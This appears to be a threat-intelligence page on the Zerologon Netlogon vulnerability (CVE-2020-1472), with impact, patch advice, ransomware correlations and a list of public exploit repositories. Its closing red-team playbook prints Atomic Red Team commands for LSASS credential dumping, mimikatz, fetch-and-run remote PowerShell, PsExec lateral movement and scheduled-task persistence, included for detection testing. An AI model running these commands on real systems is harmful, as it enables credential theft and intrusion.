CVE-2020-1472
Overview
This vulnerability is an elevation of privilege flaw rooted in improper authentication handling within the Netlogon Remote Protocol (MS-NRPC). The root cause lies in the insecure establishment of Netlogon secure channel connections to domain controllers, where cryptographic authentication enforcement is bypassed. The affected component is the Netlogon service in Microsoft Windows Server versions including 2004, which incorrectly validates secure channel requests, enabling unauthorized privileged access.
Vulnerability Description
An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. To exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access. Microsoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels. For guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020). When the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.
Impact
An attacker with network access to a domain controller can exploit this vulnerability without prior authentication or user interaction to gain domain administrator privileges. This enables full control over Active Directory, allowing unauthorized access to sensitive data, creation or modification of accounts, and lateral movement across the network. The elevated privileges undermine domain security, potentially resulting in widespread compromise of enterprise infrastructure and critical systems.
Solution
Microsoft has issued a phased two-part update to address this vulnerability by modifying Netlogon secure channel authentication enforcement. Customers running affected Windows Server versions, including 2004, should apply the security updates as outlined in the Microsoft security advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472. Administrators should follow the guidance on managing Netlogon secure channel connection changes and register for Microsoft Technical Security Notifications to receive update release alerts.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
ransomhub
|
842 | ransomware.live |
|
bianlian
|
552 | correlation_misp |
|
blackbasta
|
523 | ransomware.live |
|
conti
|
351 | correlation_mitre |
|
rhysida
|
273 | correlation_misp |
|
lockbit
|
5 | correlation_misp |
|
lockbit
|
5 | ransomware.live |
|
lockbit green
|
— | correlation_misp |
|
bian lian
|
— | correlation_misp |
|
lockbit black
|
— | correlation_misp |
|
lockbit 20
|
— | correlation_misp |
|
lockbit 30
|
— | correlation_misp |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
menuPass
|
MEDIUM | — | correlation_mitre |
|
Earth Lusca
|
MEDIUM | — | correlation_mitre |
|
FIN7
|
MEDIUM | — | correlation_mitre |
|
elpaco
|
MEDIUM | — | correlation_misp |
|
MuddyWater
|
MEDIUM | — | correlation_mitre |
|
CosmicBeetle
|
MEDIUM | — | correlation_misp |
|
Dragonfly
|
MEDIUM | — | correlation_mitre |
|
FIN12
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
An elevation of privilege vulnerability exists within the Netlogon Remote Protocol (MS-NRPC), which is utilized for secure channel connections between devices and domain controllers in Windows environments. This vulnerability allows an attacker to establish a connection to a domain controller without authentication, potentially granting them domain administrator access. The core issue lies in the way the Netlogon protocol handles secure channel connections, which can be exploited through specially crafted applications. When an attacker successfully exploits this vulnerability, they can execute arbitrary code on the network, leading to significant control over the affected systems.
The exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker could leverage the MS-NRPC to connect to a vulnerable domain controller, bypassing standard authentication mechanisms. This connection could be initiated from any device within the network, making it particularly dangerous in environments where network segmentation is weak or non-existent. Attackers could use this access to manipulate user accounts, escalate privileges, or deploy malware, thereby compromising the integrity and confidentiality of the entire network. Scenarios may include lateral movement within the network, where attackers gain access to sensitive data, or even the establishment of persistent backdoors for future exploitation.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Windows Server environments. The potential for an attacker to gain domain administrator access poses a critical business risk, as it could lead to data breaches, loss of sensitive information, and significant operational disruptions. Organizations may face regulatory penalties and reputational damage as a result of such breaches. Additionally, the financial implications of remediating an attack, including incident response, legal fees, and potential loss of business, can be substantial. The vulnerability's existence across multiple versions of Windows Server and other operating systems further amplifies the risk, as it affects a broad range of enterprise environments.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching affected systems is crucial, as Microsoft has initiated a phased rollout of updates to address the vulnerability. Organizations should prioritize the application of these updates, particularly in environments that utilize domain controllers. Implementing network segmentation can also help limit the attack surface, reducing the risk of unauthorized access to critical systems. Additionally, monitoring network traffic for unusual patterns or unauthorized connection attempts can aid in early detection of potential exploitation attempts. Employing robust access controls and ensuring that only authorized devices can connect to domain controllers will further enhance security posture.
In conclusion, the elevation of privilege vulnerability within the Netlogon protocol represents a significant threat to organizations utilizing affected Windows Server versions. The ability for an unauthenticated attacker to gain domain administrator access poses severe risks, including data breaches and operational disruptions. Organizations must remain vigilant in their patch management practices and adopt comprehensive detection and mitigation strategies to safeguard their networks. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare their organizations to defend against this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-1472, accompanied by the emergence of new proof-of-concept tools that simplify leveraging the vulnerability. This development broadens the exploit landscape, lowering the technical barrier for threat actors, including ransomware groups such as Conti and Black Basta, to gain domain administrator privileges via unauthenticated Netlogon channel attacks. The increased availability of exploitation resources correlates with a surge in observed attack activity, indicating that adversaries are actively integrating this vulnerability into their operational toolkits. Consequently, the risk profile for affected organizations has intensified, elevating the threat level from medium to high due to the greater likelihood of successful compromise and subsequent ransomware deployment. Our telemetry underscores the urgency for defenders to prioritize detection and response capabilities focused on this vulnerability’s exploitation vectors.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-1472, reflected by a notable increase in telemetry signals. This uptick coincides with sustained activity from ransomware groups such as Conti, Black Basta, and BianLian, which continue to leverage this vulnerability as a foothold for domain takeover and lateral movement. Although the EPSS score remains stable, the growing frequency of exploitation attempts and the persistence of high-confidence ransomware associations underscore an elevated operational focus on this flaw. The increased adversary engagement amplifies the risk of domain controller compromise, which can lead to widespread network disruption and ransomware deployment. Consequently, the threat level for organizations with unpatched Microsoft Windows Server 2004 environments should be reassessed upward, reflecting a transition from medium to high risk due to the intensified likelihood of successful exploitation and subsequent impact.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-1472, reflected by a sustained uptick in telemetry signals. This increase, coupled with the continued presence of multiple ransomware groups actively leveraging this vulnerability, underscores a sharpening adversary focus on domain controller compromise via the Netlogon protocol. The emergence of additional proof-of-concept exploits circulating publicly further lowers the barrier for threat actors to weaponize this flaw. These developments amplify the operational risk for organizations with unpatched Microsoft Windows Server 2004 environments, as the likelihood of successful privilege escalation and subsequent ransomware deployment grows. Accordingly, the threat level for this vulnerability should be elevated to high, reflecting its intensified exploitation landscape and the critical impact potential on enterprise network integrity.
Update 4 — June 19, 2026
CSURFACE threat intelligence has detected a slight increase in activity exploiting CVE-2020-1472, reflected in a modest rise in telemetry signals and an elevated EPSS score nearing certainty of exploitation. This subtle uptick underscores persistent adversary interest, particularly among ransomware groups such as Conti, Black Basta, and BianLian, which continue to leverage this vulnerability as part of their attack chains. The availability of multiple publicly accessible proof-of-concept exploits further lowers the barrier for threat actors to operationalize this flaw, sustaining its appeal for privilege escalation on unpatched domain controllers. Consequently, the risk profile for CVE-2020-1472 has intensified, warranting an elevation of the threat level to high. Defenders should recognize that the vulnerability remains a favored vector for ransomware campaigns, and the incremental increase in exploitation likelihood signals ongoing and potentially expanding adversary activity targeting enterprise environments.
Affected Products (25)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows Server 1903 | All |
cpe:2.3:o:microsoft:windows_server_1903:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 1909 | All |
cpe:2.3:o:microsoft:windows_server_1909:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2004 | N/A |
cpe:2.3:o:microsoft:windows_server_2004:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2012 | r2 |
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2016 | N/A |
cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2019 | N/A |
cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 20h2 | N/A |
cpe:2.3:o:microsoft:windows_server_20h2:-:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.1 |
cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.2 |
cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 14.04 |
cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
|
|
|
Canonical | Ubuntu Linux | 16.04 |
cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
|
|
|
Canonical | Ubuntu Linux | 16.04 |
cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*
|
|
|
Canonical | Ubuntu Linux | 18.04 |
cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
|
|
|
Canonical | Ubuntu Linux | 20.04 |
cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*
|
|
|
Synology | Directory Server | All |
cpe:2.3:a:synology:directory_server:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Netlogon Weak Cryptographic Authentication
auxiliary/admin/dcerpc/cve_2020_1472_zerologon
|
Tom Tervoort, Spencer McIntyre, Dirk-jan Mollema | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| ZeroLogon - Netlogon Elevation of Privilege | West Shepherd | remote | windows | - | View |
GitHub PoCs (75)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
bvcyber/CVE-2020-1472
Test tool for CVE-2020-1472
|
bvcyber | 1822 | 359 | 2020-09-08 | View |
|
dirkjanm/CVE-2020-1472
PoC for Zerologon - all research credits go to Tom Tervoort of Secura
|
dirkjanm | 1307 | 280 | 2020-09-14 | View |
|
risksense/zerologon
Exploit for zerologon cve-2020-1472
|
risksense | 697 | 146 | 2020-09-14 | View |
|
VoidSec/CVE-2020-1472
Exploit Code for CVE-2020-1472 aka Zerologon
|
VoidSec | 395 | 63 | 2020-09-14 | View |
|
bb00/zer0dump
Abuse CVE-2020-1472 (Zerologon) to take over a domain and then repair the local stored machine account password.
|
bb00 | 180 | 37 | 2020-09-14 | View |
|
mstxq17/cve-2020-1472
cve-2020-1472 复现利用及其exp
|
mstxq17 | 112 | 24 | 2020-09-16 | View |
|
Rvn0xsy/ZeroLogon
CVE-2020-1472 C++
|
Rvn0xsy | 84 | 8 | 2022-08-31 | View |
|
k8gege/CVE-2020-1472-EXP
Ladon Moudle CVE-2020-1472 Exploit 域控提权神器
|
k8gege | 58 | 21 | 2020-09-15 | View |
|
zeronetworks/zerologon
Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB
|
zeronetworks | 61 | 13 | 2020-09-17 | View |
|
cube0x0/CVE-2020-1472
|
cube0x0 | 38 | 8 | 2020-09-14 | View |
|
Privia-Security/ADZero
Zerologon AutoExploit Tool | CVE-2020-1472
|
Privia-Security | 22 | 7 | 2020-09-29 | View |
|
sho-luv/zerologon
Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @Dirkjanm's cve-2020-1472 coded examp...
|
sho-luv | 18 | 3 | 2021-01-20 | View |
|
sv3nbeast/CVE-2020-1472
CVE-2020-1472复现时使用的py文件整理打包
|
sv3nbeast | 10 | 8 | 2020-09-18 | View |
|
WiIs0n/Zerologon_CVE-2020-1472
POC for checking multiple hosts for Zerologon vulnerability
|
WiIs0n | 11 | 5 | 2020-09-29 | View |
|
B34MR/zeroscan
Zeroscan is a Domain Controller vulnerability scanner, that currently includes checks for Zerologon (CVE-2020-1472), MS-...
|
B34MR | 11 | 4 | 2021-06-23 | View |
|
thatonesecguy/zerologon-CVE-2020-1472
PoC for Zerologon (CVE-2020-1472) - Exploit
|
thatonesecguy | 8 | 5 | 2020-09-15 | View |
|
CPO-EH/CVE-2020-1472_ZeroLogonChecker
C# Vulnerability Checker for CVE-2020-1472 Aka Zerologon
|
CPO-EH | 5 | 5 | 2020-10-17 | View |
|
YossiSassi/ZeroLogon-Exploitation-Check
quick'n'dirty automated checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon), using leading artifects in d...
|
YossiSassi | 7 | 1 | 2021-01-07 | View |
|
NAXG/CVE-2020-1472
CVE-2020-1472复现流程
|
NAXG | 4 | 1 | 2020-09-15 | View |
|
CanciuCostin/CVE-2020-1472
CVE-2020-1472 - Zero Logon vulnerability Python implementation
|
CanciuCostin | 2 | 3 | 2020-09-16 | View |
|
striveben/CVE-2020-1472
|
striveben | 5 | 0 | 2020-09-26 | View |
|
0xcccc666/cve-2020-1472_Tool-collection
cve-2020-1472_Tool collection
|
0xcccc666 | 2 | 2 | 2020-09-16 | View |
|
guglia001/MassZeroLogon
Tool for mass testing ZeroLogon vulnerability CVE-2020-1472
|
guglia001 | 3 | 1 | 2022-09-30 | View |
|
0xkami/CVE-2020-1472
CVE-2020-1472漏洞复现过程
|
0xkami | 2 | 2 | 2020-09-15 | View |
|
rhymeswithmogul/Set-ZerologonMitigation
Protect your domain controllers against Zerologon (CVE-2020-1472).
|
rhymeswithmogul | 2 | 1 | 2020-09-30 | View |
|
murataydemir/CVE-2020-1472
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)
|
murataydemir | 1 | 2 | 2020-09-16 | View |
|
Udyz/Zerologon
Exploit Code for CVE-2020-1472 aka Zerologon
|
Udyz | 1 | 2 | 2021-04-06 | View |
|
shanfenglan/cve-2020-1472
|
shanfenglan | 2 | 0 | 2020-10-10 | View |
|
Anonymous-Family/Zero-day-scanning
Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CV...
|
Anonymous-Family | 1 | 1 | 2022-03-03 | View |
|
carlos55ml/zerologon
Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472).
|
carlos55ml | 0 | 2 | 2022-03-29 | View |
|
wrathfulDiety/zerologon
zerologon script to exploit CVE-2020-1472 CVSS 10/10
|
wrathfulDiety | 2 | 0 | 2021-01-01 | View |
|
mods20hh/ZeroLogon-PoC-DC-Pwn
Zerologon (CVE-2020-1472) Proof-of-Concept application - Critical Active Directory vulnerability exploitation tool.
|
mods20hh | 2 | 0 | 2025-12-06 | View |
|
jiushill/CVE-2020-1472
CVE-2020-1472
|
jiushill | 1 | 1 | 2020-09-15 | View |
|
Akash7350/CVE-2020-1472
|
Akash7350 | 2 | 0 | 2023-04-30 | View |
|
whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC
|
whoami-chmod777 | 2 | 0 | 2024-01-25 | View |
|
midpipps/CVE-2020-1472-Easy
A simple implementation/code smash of a bunch of other repos
|
midpipps | 1 | 1 | 2020-09-19 | View |
|
npocmak/CVE-2020-1472
https://github.com/dirkjanm/CVE-2020-1472
|
npocmak | 1 | 1 | 2020-09-16 | View |
|
FaFcFF41/CVE-2020-1472
|
FaFcFF41 | 0 | 1 | 2020-09-16 | View |
|
b1ack0wl/CVE-2020-1472
|
b1ack0wl | 1 | 0 | 2020-11-16 | View |
|
Tobey123/CVE-2020-1472-visualizer
|
Tobey123 | 0 | 1 | 2020-08-12 | View |
|
hectorgie/CVE-2020-1472
|
hectorgie | 0 | 1 | 2020-09-19 | View |
|
TuanCui22/ZerologonWithImpacket-CVE2020-1472
A practical proof-of-concept for CVE-2020-1472 (Zerologon) using the Impacket library to exploit Netlogon vulnerability ...
|
TuanCui22 | 0 | 1 | 2024-12-28 | View |
|
McKinnonIT/zabbix-template-CVE-2020-1472
Zabbix Template to monitor for Windows Event Viewer event's related to Netlogon Elevation of Privilege Vulnerability - C...
|
McKinnonIT | 1 | 0 | 2020-09-16 | View |
|
TheJoyOfHacking/dirkjanm-CVE-2020-1472
|
TheJoyOfHacking | 1 | 0 | 2022-02-22 | View |
|
hell-moon/ZeroLogon-Exploit
Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null
|
hell-moon | 1 | 0 | 2021-03-01 | View |
|
metehangelgi/CVE-2020-1472-LAB
Lab introduction to ZeroLogon
|
metehangelgi | 0 | 1 | 2024-02-12 | View |
|
Fa1c0n35/SecuraBV-CVE-2020-1472
|
Fa1c0n35 | 1 | 0 | 2020-09-16 | View |
|
Fa1c0n35/CVE-2020-1472
|
Fa1c0n35 | 0 | 1 | 2020-09-16 | View |
|
mingchen-script/CVE-2020-1472-visualizer
|
mingchen-script | 1 | 0 | 2020-11-05 | View |
|
victim10wq3/CVE-2020-1472
|
victim10wq3 | 0 | 1 | 2020-09-16 | View |
|
noemvex/apex-predator
Advanced AD Offensive Engine. Automates the path from stealthy recon to domain compromise. Features unauthenticated SMB ...
|
noemvex | 0 | 0 | 2026-01-29 | View |
|
dr4g0n23/CVE-2020-1472
|
dr4g0n23 | 0 | 0 | 2022-11-22 | View |
|
johnpathe/zerologon-cve-2020-1472-notes
|
johnpathe | 0 | 0 | 2020-09-20 | View |
|
maikelnight/zerologon
Check for events that indicate non compatible devices -> CVE-2020-1472
|
maikelnight | 0 | 0 | 2020-10-15 | View |
|
itssmikefm/CVE-2020-1472
|
itssmikefm | 0 | 0 | 2021-04-22 | View |
|
likeww/MassZeroLogon
Tool for mass testing ZeroLogon vulnerability CVE-2020-1472
|
likeww | 0 | 0 | 2022-09-30 | View |
|
PakwanSK/Simulating-and-preventing-Zerologon-CVE-2020-1472-vulnerability-attacks.
Simulation of the Zerologon (CVE-2020-1472) vulnerability attack in Active Directory on Windows Server 2016 and the use ...
|
PakwanSK | 0 | 0 | 2025-03-07 | View |
|
tdevworks/CVE-2020-1472-ZeroLogon-Demo-Detection-Mitigation
|
tdevworks | 0 | 0 | 2025-05-17 | View |
|
grupooruss/CVE-2020-1472
CVE 2020-1472 Script de validación
|
grupooruss | 0 | 0 | 2020-09-24 | View |
|
Ken-Abruzzi/cve-2020-1472
|
Ken-Abruzzi | 0 | 0 | 2020-09-30 | View |
|
JolynNgSC/Zerologon_CVE-2020-1472
|
JolynNgSC | 0 | 0 | 2024-03-21 | View |
|
t31m0/CVE-2020-1472
|
t31m0 | 0 | 0 | 2020-09-21 | View |
|
Fa1c0n35/CVE-2020-1472-02-
|
Fa1c0n35 | 0 | 0 | 2020-09-28 | View |
|
c3rrberu5/ZeroLogon-to-Shell
This is a combination of the zerologon_tester.py code (https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/z...
|
c3rrberu5 | 0 | 0 | 2023-08-14 | View |
|
100HnoMeuNome/ZeroLogon-CVE-2020-1472-lab
Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472)
|
100HnoMeuNome | 0 | 0 | 2025-10-04 | View |
|
puckiestyle/CVE-2020-1472
|
puckiestyle | 0 | 0 | 2020-10-21 | View |
|
JayP232/The_big_Zero
The following is the outcome of playing with CVE-2020-1472 and attempting to automate the process of gaining a shell on ...
|
JayP232 | 0 | 0 | 2020-11-10 | View |
|
SaharAttackit/CVE-2020-1472
|
SaharAttackit | 0 | 0 | 2020-12-23 | View |
|
nyambiblaise/Domain-Controller-DC-Exploitation-with-Metasploit-Impacket
End-to-end Domain Controller exploitation using Metasploit and Impacket: discovered DC10, exploited Zerologon (CVE-2020-...
|
nyambiblaise | 0 | 0 | 2025-10-18 | View |
|
commit2main/zerologon-lab
Scripts for a lab environment demonstrating the Zerologon (CVE-2020-1472) vulnerability.
|
commit2main | 0 | 0 | 2025-12-07 | View |
|
TheJoyOfHacking/SecuraBV-CVE-2020-1472
|
TheJoyOfHacking | 0 | 0 | 2022-02-22 | View |
|
Anonymous-Family/CVE-2020-1472
Test tool for CVE-2020-1472
|
Anonymous-Family | 0 | 0 | 2022-03-03 | View |
|
blackh00d/zerologon-poc
A script to exploit CVE-2020-1472 (Zerologon)
|
blackh00d | 0 | 0 | 2024-06-06 | View |
|
Whippet0/CVE-2020-1472
CVE-2020-1472
|
Whippet0 | 0 | 0 | 2020-09-28 | View |
|
logg-1/0logon
MS-NRPC (Microsoft NetLogon Remote Protocol)/CVE-2020-1472
|
logg-1 | 0 | 0 | 2024-01-07 | View |
Ransomware Groups 20
Threat Feed
51 eventsSighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Bloodhound (351 known victims)
Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Impacket, NTDS Utility (ntdsutil), PowerView, PsExec (273 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Bloodhound (351 known victims)
Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Impacket, NTDS Utility (ntdsutil), PowerView, PsExec (273 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
